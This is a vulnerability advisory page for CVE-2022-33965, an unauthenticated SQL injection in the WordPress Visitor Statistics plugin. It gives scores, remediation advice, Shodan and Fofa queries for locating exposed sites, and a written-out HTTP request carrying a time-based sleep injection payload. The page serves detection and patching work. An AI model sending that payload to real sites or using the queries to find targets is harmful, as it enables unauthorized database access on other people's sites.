🔙 목록으로 돌아가기

CVE-2022-33965: WordPress Visitor Statistics <=5.7 - SQL Injection

TitleWordPress Visitor Statistics <=5.7 - SQL Injection
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
RemediationUpdate to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.
CVSS Score9.8
EPSS Score0.39966
CVE IDCVE-2022-33965
CWE IDCWE-89
Shodan Queryhttp.html:"wp-stats-manager"
Fofa Querybody="wp-stats-manager"
Tags time-based-sqli cve2022 cve wordpress wp-plugin wp unauth sqli wp-stats-manager plugins-market vuln

🔍 Vulnerability Description

WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-33965.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-33965.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A